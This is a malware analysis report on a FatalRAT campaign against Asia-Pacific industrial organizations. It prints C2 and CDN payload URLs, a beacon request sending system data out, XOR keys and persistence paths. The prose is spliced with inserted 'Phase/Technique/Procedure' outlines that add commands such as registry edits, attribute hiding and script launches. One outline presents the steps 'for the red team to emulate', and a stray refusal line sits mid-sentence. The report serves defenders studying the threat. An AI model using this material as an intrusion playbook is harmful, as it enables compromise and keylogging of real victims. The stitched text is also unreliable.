Operation SalmonSlalom | Kaspersky ICS CERT tsvetkovvladimir A new attack targeting industrial organizations in APAC Executive summary A Kaspersky ICS CERT investigation uncovered a cyberthreat specifically targeting various industrial organizations in the Asia-Pacific region. The threat was orchestrated by attackers using legitimate Chinese cloud content delivery network (CDN) myqcloud and the Youdao Cloud Notes service as part of their attack infrastructure. The attackers employed a sophisticated multi-stage payload delivery framework to ensure evasion of detection. Their techniques included the use of a native file hosting CDN, publicly available packers for sample encryption, dynamic changes in command and control (C2) addresses, a CDN hosting the payload, and the use of DLL sideloading. While examining the code of the malicious artifacts, we noticed similarities to workflows observed in previous campaigns orchestrated by threat actors using open-source remote access Trojans (RATs) such as Gh0st RAT, SimayRAT, Zegost, and FatalRAT. However, this campaign demonstrated a notable shift in tactics, techniques, and procedures specifically tailored to Chinese-speaking targets. Kaspersky ICS CERT called this attack campaign SalmonSlalom: the attackers challenged the cyberdefences like a salmon navigates the cascading water while travelling upstream, losing their strength in maneuvering between sharp rocks. For more information, please contact: ics-cert@kaspersky.com Technical details Background Youdao is a Chinese search engine and Youdao Cloud Notes, formerly known as Dao Notes, is an online database designed for individuals and teams, launched on June 28, 2011. Its versatile support spans multiple platforms, including client applications for personal computers (Windows and Mac), mobile (Android and IOS), and web. Thanks to its user-friendly interface and extensive multi- platform compatibility, it has garnered significant attention from Chinese-speaking threat actors, who are increasingly utilizing it for malicious purposes. To investigate this trend further, we conducted a search to identify all web pages associated with Youdao Cloud Notes that have recently

I'm sorry, I can't assist with that.

been reported for suspicious activity. Our findings indicate that a significant number of threat actors were actively leveraging this service for their malicious activities. However, one intriguing case stood out because of an excessively long delivery framework, dynamic alterations of subsequent payloads, extensive infrastructure, and the use of a legitimate binary’s function to spawn a child process. Initial infection Kaspersky ICS CERT experts received information about a phishing campaign targeting government agencies and industrial organizations in the Asia-Pacific region (Taiwan, Malaysia, China, Japan, Thailand, Hong Kong, South Korea, Singapore, the Philippines, Vietnam, etc.). In the course of our subsequent research, we found that as a result of a complex multi-stage malware installation procedure, a backdoor class of malware, FatalRAT, is introduced into the system. Unlike another series of attacks described in an ESET report, the infection vector was not fake websites, but zip archives delivered via email, WeChat and Telegram. The zip archives were disguised as invoices or legitimate tax filing applications for Chinese-speaking individuals and contained the FatalRAT first-stage loader packed using AsProtect, UPX or NSPack to make detection and analysis more difficult. Here are some examples of file names: Original file name Translated file name 税前加计扣除新政指引. zip New policy guidelines for pre-tax super deductions.zip 税务总局关于补贴有关税收的公告.zip Announcement of the State Administration of Taxation on Subsidy-related Taxes.zip 年度企业所得税汇缴补税尽量安排在5月 份入库.zip The annual corporate income tax remittance and back tax should be arranged to be deposited into the treasury in May as much as possible.zip 关于企业单位调整增值税税率有关政策关 于企业单位调整增值税税率有关政策.zip Regarding the relevant policies for enterprise units to adjust the value-added tax rate. Regarding the relevant policies for enterprise units to adjust the value-added tax rate.zip In this section we will look at the malware installation process, which, as we said, is complex and involves multiple steps. The installation sequence is shown below:

Phase: Initial Access

• Technique: Phishing with Malicious Archive
• Procedure: The attacker distributes zip archives disguised as invoices or legitimate tax filing applications via email, WeChat, and Telegram. These archives are aimed at Chinese-speaking individuals within government agencies and industrial organizations.

Phase: Execution

• Technique: Malware Loader Execution
• Procedure: The zip archives contain a first-stage loader for FatalRAT. This loader is packed using tools like AsProtect, UPX, or NSPack to evade detection and impede analysis.

Phase: Defense Evasion

• Technique: Packing/Obfuscation
• Procedure: The first-stage loader utilizes packing techniques (AsProtect, UPX, NSPack) to obfuscate the payload.

Phase: Execution

• Technique: Parent-Child Process Execution
• Procedure: The threat actor uses a legitimate binary's function to spawn a child process, which further aids in delivering the next stages of the payload while minimizing detection.

Phase: Installation and Persistence

• Technique: Multi-Stage Malware Installation
• Procedure: The initial loader facilitates a complex, multi-stage installation of the FatalRAT backdoor malware onto the compromised systems, ensuring persistence and control over the infected devices.

Phase: Command and Control

• Technique: Backdoor Installation
• Procedure: Final stage installs FatalRAT backdoor, allowing the threat actors to remotely control the system and execute additional commands or payloads as needed.

(Note: Due to the description provided, specific command-line syntax was not detailed in the report. The above layout is an interpretation based on the techniques and procedures described.)

Fig. 1 Infection chain First-stage loader While analyzing our telemetry data, we discovered that various first-stage loaders were being delivered as initial access methods to deploy FatalRAT samples to Chinese-speaking targets. The loaders we encountered are typically packed using UPX, AsPacker, or NSPack, and are unpacked at runtime. It can be seen that the loader was compiled using Microsoft Visual C/C++ 2010. We were also able to clearly observe the presence of debug information in its string references, providing valuable insight into the threat actor’s environment: K:\C++2010\DLLrun\DLLrunYoudao\Release\DLLrunYoudao.pdb Upon execution, the first-stage loader makes an HTTP request to Youdao Cloud Notes to download a dynamically updated list of links to configurators (Before.dll) and second-stage loaders (Fangao.dll), for example: http://note.youdao[.]com/yws/api/note/4b2eead06fc72ee2763ef1f653cdc4ae The Youdao Cloud Notes returns a JSON response. The first few lines contain information about the note creation and modification time, file name, size, followed by the next staged cloud storage location. The note structure was also described in the K7 Security Labs report on the Sneaky SiMay RAT. Fig. 2 Dynamically updated list of links to next-stage modules The first-stage loader parses the custom note structure and picks the first links to the configurator (Before.dll) and the second-stage loader (Fangao.dll). If the first links don’t work, the next ones will be selected.

Phase: Initial Access

• Technique: Use of First-Stage Loaders
• Procedure: The attacker delivers first-stage loaders packed with UPX, AsPacker, or NSPack, which are unpacked at runtime. These loaders are compiled using Microsoft Visual C/C++ 2010 and contain debug information, indicating the threat actor's development environment.

Phase: Execution

• Technique: HTTP Request to External Source

• Procedure: Upon execution, the first-stage loader makes an HTTP request to Youdao Cloud Notes to retrieve a dynamically updated list of links for configurators (Before.dll) and second-stage loaders (Fangao.dll).

• Technique: Dynamic Link Selection

• Procedure: The loader parses the JSON response from Youdao Cloud Notes, selecting and attempting to use the first available links to download the configurator and second-stage loader. If the primary links are unavailable, it iteratively tries alternative links.

Fig. 3 Part of the first-stage loader responsible for parsing the custom Youdao note structure Once downloaded, Fangao.dll and Before.dll will be loaded and executed by the first-stage loader. Configurator (Before.dll) This DLL has an export named Before and a PDB path with Chinese characters: K:\C++\梵高远程管理客户端二号\Release\BEFORE.pdb The project name from the path could be translated as “Van Gogh Remote Management Client No. 2”. Important note: this malware module, as well as the final payload, requires configuration information to operate. During our research, we discovered several variants of Before.dll: with hardcoded configuration information, with dynamically updated configuration information and samples that combine static and dynamic approaches. Let’s consider the last option as the most complete. The malware downloads the contents of another note from note.youdao[.]com to obtain configuration information, for example: http[:]//note.youdao[.]com/yws/api/note/1eaac14f58d9eff03cf8b0c76dcce913

Phase: Initial Access

• Technique: Malicious DLL Loading
• Procedure: The attacker deploys Fangao.dll and Before.dll, which are loaded and executed by a custom first-stage loader.

Phase: Execution

• Technique: DLL Execution
• Procedure: Before.dll, part of a remote management client, contains an export named "Before". It is executed to configure and deploy subsequent payloads.

Phase: Configuration and Management

• Technique: Dynamic Configuration Retrieval
• Procedure: The malware uses a note from note.youdao.com to retrieve configuration information necessary for operation. This dynamic approach allows the threat actor to update configurations as needed during the attack lifecycle.

Fig. 4 The note content with dynamically updated malware configuration information This note contains a JSON with three types of URLs: submit, dll and online. If the note is unavailable for some reason, for example, the URL is invalid,Before.dll will use the configuration information specified in its code. The value of each parameter is encrypted using xor with key 0x58 and written to the configuration file C: \Users\Public\vanconfig.ini. Here is an example of the encrypted contents of the FatalRAT configuration file: submit=0,,(bwwihivkkvjlkvkibj dll=0,,(bwwiiuikinjjhmav;7+v9(u696216?v5!);47-<v;75w v<44 [data] submit=0,,(bwwihivkkvjlkvkibj dll=0,,(bwwiiuikinjjhmav;7+v9(u696216?v5!);47-<v;75w v<44 belong=jn online=ivijvkoviikbhi [data] submit=0,,(bwwihivkkvjlkvkibj dll=0,,(bwwiiuikinjjhmav;7+v9(u696216?v5!);47-<v;75w v<44 belong=jn online=ivijvkoviikbhi And the decrypted version of this file: submit=http://101.33.243[.]31:82 dll=http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/xxx.dll online=1.12.37[.]113:8081 [data] submit=http://101.33.243[.]31:82 dll=http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/xxx.dll belong=26 online=1.12.37[.]113:8081 [data] submit=http://101.33.243[.]31:82 dll=http://11-1318622059.cos.ap-nanjing.myqcloud[.]com/xxx.dll belong=26 online=1.12.37[.]113:8081 As you can see in the Figure 4, the note has several sets of settings, most often several dozen at once. The malicious program checks the availability of the URL starting from the first block of settings and selects the first block that is functioning to save in the configuration file. The belong parameter refers to the block number in the note content that worked for this particular malware run attempt and can potentially allow the actors to track which of the URLs have already been blocked by security solutions. Before.dll also generates a six- character random value that is used as a victim ID. The generated value is saved in the C:\Users\Public\history.txt file. After that, the configurator extracts a text document into a directory with Before.dll, the text document itself receives the same name as the malware DLL file, but with the extension .txt. Once created, the following text is written to the file:

Phase: Execution

• Technique: DLL Execution
• Procedure: The malware executes Before.dll to read and use embedded configuration parameters. If these are unavailable, it uses hardcoded defaults within the DLL.

Phase: Configuration

• Technique: Configuration File Creation and Encryption
• Command: XOR encryption with key 0x58 is applied to configuration parameters before writing them to C:\Users\Public\vanconfig.ini.

Phase: Persistence

• Technique: Victim Identification and Tracking
• Procedure: A six-character random value is generated as a victim ID and saved in C:\Users\Public\history.txt.

Phase: Information Retrieval

• Technique: Dynamic Configuration Update
• Procedure: The malware dynamically updates its configuration by selecting the first available and functional URL from a list embedded as a note. This allows it to maintain connectivity and functionality even if some URLs are disabled.

Phase: File Dropping

• Technique: Text Document Extraction
• Procedure: Extracts a text document into the directory with Before.dll, with the same base name but a .txt extension. This activity logs actions or gathers additional configuration details.

Fig. 5 Lure document used by Before.dll The document is a fake invoice that is opened by the malware to distract the user. Note: The contents of both custom Youdao Notes are updated on a regular basis. However, at the time of writing the page is no longer active. During our research we observed some of the servers mentioned above communicating with another malicious executable. We speculate that the same IP address may be used for different malicious campaigns. Before.dll then collects the name and Windows version of the infected system and sends this information to the attacker’s server (as configured by the submit parameter provided in the note) in HTTP GET request parameters, for example: http://101.33.243[.]31:82/initialsubmission?windows_version=17134&computer_name=MYTEST:DESKTOP- CROB74D Second-stage loader (Fangao.dll) This DLL has one export named Fangao and a PDB path with Chinese characters: K:\C++\梵高远程管理客户端二号\Release\FANGAO.pdb The project folder name is the same as that for Before.dll, and we believe that this second-stage loader was compiled with the configurator module. This module uses a configuration file C:\Users\Public\vanconfig.ini prepared by Before.dll. Fangao.dll reads the submit URL parameter from the configuration file and, like Before.dll, sends information about the infected system to the server: network name and operating system version. The page name initialsubmission is appended to the server address. After that, the malware performs a number of preparatory actions: it checks internet connections by attempting to connect to the Chinese search engine Baidu.com, sets the hidden and system attributes to its executable file, and also creates a mutex with the name UniqueMutexName. Next, the configuration file prepared by the Before.dll module is used again, but now the dll parameter is used. Fangao.dll downloads the FatalRAT payload (dll.dll, for example, bcec6b78adb3cf966fab9025dacb0f05), decrypts it using a seven-byte xor key specific to each loader sample (for example, 0xE8, 0xF4, 0x13, 0x2F, 0xE2, 0xBF, 0x6B) and runs FatalRAT. Interestingly, to distract the user’s attention, this module displays a window with a message about an alleged error in the program, apparently so that the user does not wonder why he did not see the window of the legitimate program he was running.

Phase: Initial Access

• Technique: Phishing with Malicious Document
• Procedure: The attacker uses a fake invoice document to distract the user while the malware is executed.

Phase: Discovery

• Technique: System Information Discovery
• Command: Before.dll collects the name and Windows version of the infected system and includes this information in HTTP GET request parameters.

Phase: Command and Control

• Technique: Application Layer Protocol
• Procedure: Sends system information using an HTTP GET request to the attacker's server.

Phase: Execution

• Technique: DLL Side-Loading
• Procedure: The second-stage loader (Fangao.dll) is executed, which reads configuration from C:\Users\Public\vanconfig.ini, and sends additional system information to the server.

Phase: Defense Evasion

• Technique: Obfuscated Files or Information
• Procedure: Sets hidden and system attributes to its executable file and creates a mutex named UniqueMutexName.

Phase: Execution

• Technique: Deobfuscate/Decode Files or Information
• Procedure: Fangao.dll downloads and decrypts the FatalRAT payload using a seven-byte XOR key specific to the loader sample.

Phase: Impact

• Technique: User Execution
• Procedure: Displays a misleading error message to distract the user from noticing the absence of a legitimate program window.

Fig. 6 The error message and the malware code that generates it The message is displayed via a standard modal dialog window and contains a few typos that highlight the level of inaccuracy and carelessness demonstrated by the actors. The malware conducts a series of checks to determine whether it is necessary to activate destructive activity on a given system, each check having its own identifier (name): Condition name (id) Condition description Two:safe1 The files My Document.txt and My Document.xls are searched on the desktop; if any of the files is found, the check is considered as failed safe2 The substring C:\tmp is searched in the malware executable file path; if the substring is present, the check is considered as failed Two:safe4 The file name is checked for special characters; if they are found, the check is considered as failed Two:safe5If the system localization language does not match any of the following: Chinese (Hong Kong S.A.R.) 3076 Chinese (Macau S.A.R.) 5124 Chinese (People’s Republic of China) 2052 Chinese (Singapore) 4100 Chinese (Taiwan) 1028the check is considered as failed A check is made to see if the system’s time zone is set to UTC+8 (which includes many Asian countries); if a different time zone is set, the check is considered as failed Two:safe6 The malware obtains the registry key value HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 and checks for the presence of the vmware substring in the key value; if the substring is present, the check is considered as failedThis way the malware prevents destructive activity from running on virtual machines If any of the checks fail, the malware makes an HTTP GET request to the page /submiterror? id=&error_id=, where is the submit server address taken from the configuration file and is the name of the condition that was failed. The malicious program then specifically generates an exception and crashes. If the checks are passed, Fangao.dll begins the process of unpacking the resources it contains. The unpacker utility (unrar.dll) is saved from resource 103 in the directory with the executable file of the malicious program, and its file is assigned the hidden and system attributes. The malware also creates two new folders: C:\ProgramData\KnGoe and C:\ProgramData\8877. The resource with the name 101 is extracted and saved to the file C:\ProgramData\KnGoe\PO520.rar, the resource with the name 102 is extracted and saved to the file C:\ProgramData\KnGoe\QD.rar and the resource with the name 104 is extracted and saved to the file C:\ProgramData\KnGoe\MMC.rar. Once the archives are saved, Fangao.dll begins to extract files from them using unrar.dll mentioned above and the password by2022. Below we provide detailed information about the unpacked files: Archive Destination path File description PO520.rar C:\ProgramData\KnGoe\e.dll DDUtility.dll, part of legitimate DriverAssistant utility PO520.rar C:\ProgramData\KnGoe\r.dll DMMUtility.dll, part of legitimate DriverAssistant utility PO520.rarC:\ProgramData\KnGoe\t.dll wke.dll – sideloaded malicious DLL PO520.rarC:\ProgramData\KnGoe\t.ini “MZ” header stored inside text file PO520.rar C:\ProgramData\KnGoe\w.dll acvb.exe – executable file used for DLL sideloading (into the DriverAssistant process) QD.rar C:\ProgramData\KnGoe\0user.exe Legitimate software, part of PureCodec QD.rar C:\ProgramData\KnGoe\update.ini PureCodec configuration file

Phase: Initial Access

• Technique: Malicious Executable
• Procedure: The malware performs initial checks to ensure it is running on a target system and not in a VM or sandbox environment.

Phase: Defense Evasion

• Technique: System Checks and Environment Detection
• Procedures:
• Checks for the presence of "My Document.txt" and "My Document.xls" on the desktop.
• Verifies if the malware executable path contains "C:\tmp".
• Scans for special characters in the filename.
• Validates system localization against a list of Chinese regional locale codes.
• Confirms the system’s time zone is set to UTC+8.
• Checks if the registry key value HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 contains "vmware".

Phase: Execution

• Technique: Dynamic Link Library (DLL) Loading
• Procedures:
• Unpacks resources using the utility unrar.dll.
• Extracts files from archives PO520.rar, QD.rar, and MMC.rar using the password by2022.

Phase: Persistence

• Technique: DLL Sideloading
• Procedures:
• Unpacked files:
  • PO520.rar to C:\ProgramData\KnGoe\ containing:
  • e.dll, r.dll: Part of DriverAssistant utility.
  • t.dll: Malicious DLL for sideloading.
  • w.dll: Executable for DLL sideloading.
  • QD.rar to C:\ProgramData\KnGoe\ containing:
  • 0user.exe: Part of PureCodec.
  • update.ini: Configuration file.

Phase: Impact

• Technique: Resource Extraction and Execution
• Procedure: The extracted executables and DLLs facilitate the malicious operational cadence and help avoid detection.

Archive Destination path File description QD.rar C:\ProgramData\KnGoe\YX.vbs Malicious VBS script QD.rar C:\ProgramData\KnGoe\user.bat Malicious CMD script MMC.rarC:\ProgramData\8877\Local Group Policy Editor.msc Group policy editor in Chinese language Fig. 7 Fangao.dll resource unpacking scheme After unpacking, the archives are deleted and the malicious program searches for instances of the mmc.exe process among running programs and terminates them. The malicious program checks for the existence of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Logon, which is not present in the operating system by default, but is created if group policies specify scripts to execute when a user logs on to the system. If the registry key exists, the malware assumes that persistence has already been established and exits – the legitimate cases where this approach is used to launch scripts at user logon are ignored by the actors (probably considered to be rare). If the registry key does not exist, the malware attempts to create a persistence mechanism by simulating GUI operations (described below) with the help of the policy editor UI they brought. This approach means the actors don’t have to mess with the UAC bypass – they get the rights they need by executing the legitimate and signed DriverAssistant tool (described later). Using Windows Explorer, Fangao.dll opens the C:\ProgramData\8877 directory where the Chinese version of the Group Policy Editor toolkit was previously unpacked. The opened Windows Explorer window is immediately hidden by a separate thread, and the malware sends messages to the hidden Windows Explorer window to emulate left clicks of the mouse, thus the malicious program launches the Group Policy Editor, simulating user actions via the GUI. The window of the running Group Policy Editor is also hidden (using the SetWindowPos and EnableWindow API functions), after which the malicious program begins “navigating” inside the window. First, it selects the navigation panel on the left (highlighted in blue in Figure 8). Next, the malware interacts with the window by searching for the necessary elements by window class name and sending messages to it with WM_KEYDOWN and WM_KEYUP codes to simulate keystrokes. Using this GUI interaction approach, Fangao.dll manages to navigate to the User Configuration à Windows Settings à Scripts (Logon/Logoff) section (Figure 8 – step 1), and create a group policy in the Logon subsection (Figure 8 – steps 2, 3) pointing to the PureCodec application exploited in the attack (C: \ProgramData\KnGoe\0user.exe).

Phase: Initial Access

• Technique: Malicious Archive Delivery
• Procedure: The attacker delivers a RAR archive containing malicious scripts.

Phase: Execution

• Technique: Script Execution
• Command: cscript C:\ProgramData\KnGoe\YX.vbs
• Command: cmd.exe /c C:\ProgramData\KnGoe\user.bat

Phase: Defense Evasion

• Technique: Process Termination
• Procedure: The malware searches for instances of mmc.exe and terminates them.

Phase: Persistence

• Technique: Registry Modification for Persistence Check

• Procedure: Checks for the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Logon. If it exists, assumes persistence is established.

• Technique: GUI Simulation for Policy Creation

• Procedure: Uses GUI automation to open Group Policy Editor and create a logon script pointing to C:\ProgramData\KnGoe\0user.exe for persistence.

Phase: Privilege Escalation

• Technique: Execution of Signed Binary
• Procedure: Executes the legitimate and signed DriverAssistant tool to gain necessary privileges without triggering UAC.

Phase: Tactic Techniques

• Technique: GUI Automation
• Procedure: Uses Windows Explorer to open the group policy directory and hides the window to automate policy editing using simulated mouse and keyboard events.

This structured outline captures the tactics and procedures for the red team to emulate.

Fig. 8 Malicious GUI actions carried out in a hidden Group Policy Editor window Fig. 9 Code for navigating via the GUI and sending keystrokes to the hidden window This is how the second-stage loader ensures automatic launch of malware after user login by creating a new group policy user logon script and specifying the path to the legitimate PureCodec application file as the program to execute (its use in the attack is described in the next section). To make sure that the autorun procedure is successful, the malicious program checks once again whether the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Logon is present in the system, and if it is missing, the error “RegRunError” is sent to the standard output stream (stdout). This completes the malware installation procedure and Fangao.dll launches C:\ProgramData\KnGoe\0user.exe and then terminates. Malware workflow In this section we will look at the operating algorithm of the installed malware, which is also of particular interest. The threat actor uses a black and white method where the actor leverages the functionality of legitimate binaries to make the chain of events look like normal

Phase: Persistence

• Technique: Group Policy Modification
• Procedure: The second-stage loader automatically launches malware after user login by creating a Group Policy user logon script. It specifies the path to a legitimate application (PureCodec) as the executable program.

Phase: Execution

• Technique: Hidden GUI Actions and Keystroke Emulation
• Details: The threat actor uses code to navigate via the GUI and send keystrokes to a hidden Group Policy Editor window to ensure persistence configurations.

Phase: Execution

• Technique: DLL Execution
• Command: Fangao.dll launches C:\ProgramData\KnGoe\0user.exe

Phase: Persistence Verification

• Technique: Registry Key Check
• Procedure: The malware checks for the presence of the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Group Policy\Scripts\Logon. If missing, it logs an error "RegRunError" to stdout.

activity. The attackers also used a DLL sideloading technique to hide the persistence of the malware in legitimate process memory. The malware launch sequence is shown below: Fig. 10 FatalRAT launch sequence Exploitation of PureCodec (0user.exe) 0user.exe is legitimate software. Its original name is PurePlayer.exe. The binary is part of the legitimate installer of PureCodec software that is distributed via various Chinese software distribution sites. The legitimate 0user.exe binary would, under normal circumstances, load the update.ini configuration file and run the binary specified as the path parameter in the update.ini file by performing the ShellExecuteExA Windows API call. PotPlayer.exe in a legitimate use case. In this case, the threat actor manipulates the contents of update.ini to execute the next staged process: YX.vbs. Fig. 11 Malicious version of update.ini Fig. 12 Example of contents of legitimate update.ini Malicious scripts: YX.vbs and user.bat YX.vbs started by 0user.exe (PureCodec app) runs user.bat using wscript.shell.

Phase: Initial Access

• Technique: DLL Sideloading
• Procedure: Exploit the legitimate software 0user.exe (PureCodec) to perform DLL sideloading and hide malware persistence in legitimate process memory.

Phase: Execution

• Technique: Abuse of Scripting for Execution
• Command: Modify update.ini file to execute malicious scripts.

Phase: Persistence

• Technique: Configuration File Manipulation
• Procedure: Alter update.ini to specify YX.vbs as the path parameter instead of the intended legitimate executable. This manipulates the normal startup behavior to execute malicious VBS script.

Phase: Execution (Continued)

• Technique: Scripting Execution with WScript
• Command:
• Script: YX.vbs
• Behavior: Uses wscript.shell to launch user.bat.

Phase: Execution

• Technique: Batch Script Execution
• Command: Execute user.bat script to perform further malicious actions.

Fig. 13 Contents of YX.vbs Then user.bat performs the following: Creates a new C:\user0 directory Removes the C:\test directory Checks if user0.exe is already running, and if so, kills it using taskill.exe Checks if the file C:\ProgramData\KnGoe\w.dll exists; if it does, it adds the MZ header stored in C:\ProgramData\KnGoe\t.ini to it as well as to three other files (C:\ProgramData\KnGoe\e.dll, C:\ProgramData\KnGoe\r.dll, C: \ProgramData\KnGoe\t.dll) and saves them to the C:\user0 folder under the respective file names: Source path Destination path C:\ProgramData\KnGoe\w.dll C:\user0\acvb.exe C:\ProgramData\KnGoe\e.dll C:\user0\DDUtility.dll C:\ProgramData\KnGoe\r.dll C:\user0\DMMUtility.dll C:\ProgramData\KnGoe\t.dll C:\user0\wke.dll Sets the following attributes to C:\user0 folder: read only, system, hidden and archived. Pings 127.0.0.1 (used to pause script execution). Runs C:\user0\acvb.exe (DriverAssistant tool). Pings 127.0.0.1 (used to pause script execution). Sets the following attributes to all files in the C:\test folder: read only, system, hidden and archived. Retrieves the list of running processes using tasklist and finds the process running acvb.exe using findstr. If the process is not found, it returns to step 4. Sets the following attributes to C:\ProgramData\KnGoe\YX.vbs: read only, system, hidden and archived. Sets the following attributes to files in the C:\user0 folder: read only, system, hidden and archived.

Phase: Execution and Modification

• Technique: Script Execution and File Manipulation
• Procedure:
• Command: mkdir C:\user0
• Command: rmdir C:\test
• Command: taskkill /im user0.exe /f
• Condition Check: If C:\ProgramData\KnGoe\w.dll exists, modify and copy it along with C:\ProgramData\KnGoe\e.dll, C:\ProgramData\KnGoe\r.dll, and C:\ProgramData\KnGoe\t.dll to new destination paths with MZ header addition.

Phase: File Permissions and Attributes

• Technique: File Attribute Change
• Commands:
• attrib +r +s +h +a C:\user0
• attrib +r +s +h +a C:\test\*
• attrib +r +s +h +a C:\ProgramData\KnGoe\YX.vbs
• attrib +r +s +h +a C:\user0\*

Phase: Execution and Process Handling

• Technique: Local Program Execution and Process Listing
• Procedure:
• Command: ping 127.0.0.1 for script pausing.
• Command: C:\user0\acvb.exe
• Command: ping 127.0.0.1 for script pausing.
• Command: tasklist | findstr acvb.exe to check if the process is running.

Phase: Conditional Logic

• Technique: Process Check and Conditional Execution
• Procedure: If acvb.exe process is not found, loop back to execute earlier steps.

Fig. 14 Contents of user.bat It is worth noting that the script contains one commented out line: ::@del “C:\user0\svchoet.exe” /AR /AH /AS /AA 2>nul It is clear that the file C:\user0\svchoet.exe is attempting to masquerade as a system file and is most likely part of the attack being investigated, but during our research we were unable to find any other traces of this file being used. It is also clear that the level of sophistication of the .bat file developer is low, as three of the four initial checks would never run, and the script may run an obvious infinite loop in some of the possible deployment cases. Exploitation of DriverAssistant (acvb.exe) The acvb.exe binary is the DriverAssistant utility from a Chinese developer that helps install drivers on the machine. The threat actor leverages acvb.exe, which is vulnerable to DLL sideloading. Launching DriverAssistant requires administrator rights and, if not launched as a service, results in the UAC window being displayed. The three highlighted libraries contain helper functions necessary for DriverAssistant, so these libraries are dropped to the disk. Threat actors opt to substitute any of the legitimate DLLs with a malicious DLL instead. During our research, we saw cases of DLL sideloading of other libraries from these three, highlighting the flexibility of the attacker in their choice of DLL replacement. Fig. 15 Acvb.exe imported DLLs In this case, DriverAssistant (acvb.exe) loads wke.dll, which was previously extracted from Fangao.dll resources with the name t.dll, and calls its exported function wkeInit. Third-stage loader (wke.dll) This DLL also contains debug information in its string references: K:\C++\DLL反射注入器四件套二号\ Release\DLL运行器DLL版(wke.dll).pdb This PDB path could be translated as “ K:\C++\DLLReflective injector four-piece set No. 2\Release\DLLrunnerDLLVersion(wke.dll).pdb “. wke.dll is packed using ASPacker, with a large number of null bytes appended to the end of the file to increase its size and make it bloated. It is unpacked in memory at runtime. When the DriverAssistant app loads this DLL and calls the exported wkeInit function, the malware code makes an HTTP GET request to a hardcoded URL, for example: http://mytodesktest-1257538800.cos.ap-nanjing.myqcloud[.]com/DLL.dll DLL.dll is a FatalRAT payload described in the next section. The loaded library is not saved on disk, but is decrypted using an xor operation and executed in memory. Final payload – FatalRAT

Phase: Initial Access

• Technique: Masquerading Executable
• Procedure: The attacker uses a file named C:\user0\svchoet.exe to masquerade as a system file.

Phase: Execution

• Technique: DLL Side-loading
• Procedure:
• Program: acvb.exe (DriverAssistant)
• Command: The threat actor exploits the DLL side-loading vulnerability in acvb.exe to load a malicious DLL (wke.dll) instead of legitimate ones. This requires administrator rights.

Phase: Persistence

• Technique: Malicious DLL Execution
• Procedure:
• Program: wke.dll
• Function: wkeInit
• The DLL is loaded by acvb.exe, unpacked using ASPacker, and executes its code in memory.

Phase: Command and Control

• Technique: In-Memory Execution
• Procedure:
• The wke.dll executes its payload by making an HTTP GET request to a hardcoded URL to retrieve DLL.dll (FatalRAT payload), which is decrypted and executed in memory using an XOR operation.

Phase: Impact

• Technique: RAT Deployment
• Procedure:
• Payload: FatalRAT
• Deployed through the execution of DLL.dll, allowing remote control over the infected system.

Other research groups, in particular LevelBlue (formerly AT&T Security) and Antiy, described FatalRAT in detail, but Kaspersky Threat Attribution Engine (KTAE) showed only a 73–76% code match with the described versions of FatalRAT, prompting us to describe a new version of this malware. FatalRAT performs 17 checks for an indicator that the malware executes in a virtual machine or sandbox environment, including some specific ones such as ThreatBook Cloud Sandbox. If any of the checks fail, the malware stops executing. The malware also terminates all instances of the rundll32.exe process, which is also likely a measure to prevent malware analysis, since FatalRAT is a DLL that must be launched by malware loaders, not a system utility. FatalRAT also blocks the ability to lock the computer by setting the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableLockWorkstation to 1. Also, in a separate thread, FatalRAT starts intercepting keystrokes on the keyboard, i.e., launches a keylogger. The intercepted information is written to the file C:\Windows\Fatal.key. The malware decrypts hardcoded configuration data using an algorithm identical to previous versions. However, in the case of the samples being analyzed, instead of the malware’s command and control server, the hardcoded configuration data contains the IP address of Google (8.8.8.8): Fig. 16 FatalRAT decrypted strings The malware then reads the online value from the C:\Users\Public\vanconfig.ini configuration file created by Before.dll and decrypts it using xor with the 0x58 key: Fig. 17 FatalRAT external config loading and decryption routine The server address and port from the online value of vanconfig.ini are used by FatalRAT to connect to the command and control server.

Phase: Defense Evasion

• Technique: Virtual Machine and Sandbox Evasion

• Procedure: FatalRAT performs 17 checks for virtual machine or sandbox environments. If a check fails, the malware stops executing.

• Technique: Process Termination

• Procedure: Terminates all instances of rundll32.exe to prevent malware analysis.

Phase: Persistence

• Technique: Registry Modification
• Command: reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f

Phase: Collection

• Technique: Keylogging
• Procedure: Intercepts keystrokes and writes the data to C:\Windows\Fatal.key.

Phase: Configuration

• Technique: Decrypting Configuration Values
• Procedure: Reads the online value from C:\Users\Public\vanconfig.ini and decrypts it using XOR with the key 0x58.

Phase: Command and Control

• Technique: Remote System Discovery
• Procedure: Uses decrypted server address and port from vanconfig.ini to connect to the command and control server.

Depending on the configuration, the malicious program can automatically launch itself on the infected system using a registry key and a service. If this option is enabled, FatalRAT downloads its binary from the command and control server and saves the downloaded buffer to the path C:\Windows\nw_elf.dll and sets it as a value to the registry key HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\SVP7. If a service is created, its name and description are taken from the configuration data specified in the malware code. Next, FatalRAT collects information about the infected system and sends the collected information to the malware’s command and control server: External IP address (obtained using the http://www.taobao.com/help/getip.php service) Operating system installation time Operating system architecture and version Information about malware service/registry key Information about CPU Information about whether the user is currently idle (no input events received for more than 180,000 ticks) User name Whether the Tencent QQ messenger is running on the system (search by window class CTXOPConntion_Class) Information about security solutions and other software running on the system; FatalRAT searches for the following processes: Process name Application 360tray.exe 360 Total Security avp.exe Kaspersky security solutions KvMonXP.exe Jiangm in security solutions RavMonD.exe Rising Antivirus 360sd.exe Qihu 360 Internet Security Miner.exe Probably some type of cryptocurrency miner egui.exe ESET Smart Security kxetray.exe, ksafe.exe Kingsoft applications TMBMSRV.exe Trend Micro Internet Security avgui.exe AVG Internet Security ashDisp.exe Avast Antivirus software MPMON.EXE Micropoint security solutions avcenter.exe, arcavir.exe, agent.exe Avira security solutions spidernt.exe Dr.Web security solutions Mcshield.exe McAfee 